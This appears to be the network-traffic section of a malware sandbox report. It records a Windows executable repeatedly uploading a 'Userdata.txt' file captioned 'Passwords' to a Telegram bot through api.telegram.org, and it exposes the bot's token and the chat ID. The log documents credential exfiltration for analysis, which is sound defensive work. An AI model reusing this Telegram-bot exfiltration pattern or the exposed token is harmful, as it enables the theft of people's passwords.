                                                                                                                2025-01-10 21:44:19 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43646,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545459,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.650041149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:20 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33a3e2842e8e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 33 65 32 38 34 32 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33a3e2842e8eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:21 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:21 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 546
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:21 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43647,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545461,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.650043149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:22 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33bdc8e3eade
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 64 63 38 65 33 65 61 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33bdc8e3eadeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:23 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:22 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:23 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43648,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545462,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.650045149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:24 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33d8e5a89915
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 38 65 35 61 38 39 39 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33d8e5a89915Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:24 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:24 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:24 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43649,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545464,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.650047149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:25 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33f53b4a9af3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 35 33 62 34 61 39 61 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33f53b4a9af3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:26 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:26 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:26 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43650,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545465,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.650049149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:27 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3412c5964a4a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 32 63 35 39 36 34 61 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3412c5964a4aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:27 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:27 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:27 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43651,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545467,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.650051149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:28 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3432c65a2e7c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 32 63 36 35 61 32 65 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3432c65a2e7cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:29 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:29 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:29 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43652,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545469,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.650053149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:30 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd34590f156764
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 35 39 30 66 31 35 36 37 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd34590f156764Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:30 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:30 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
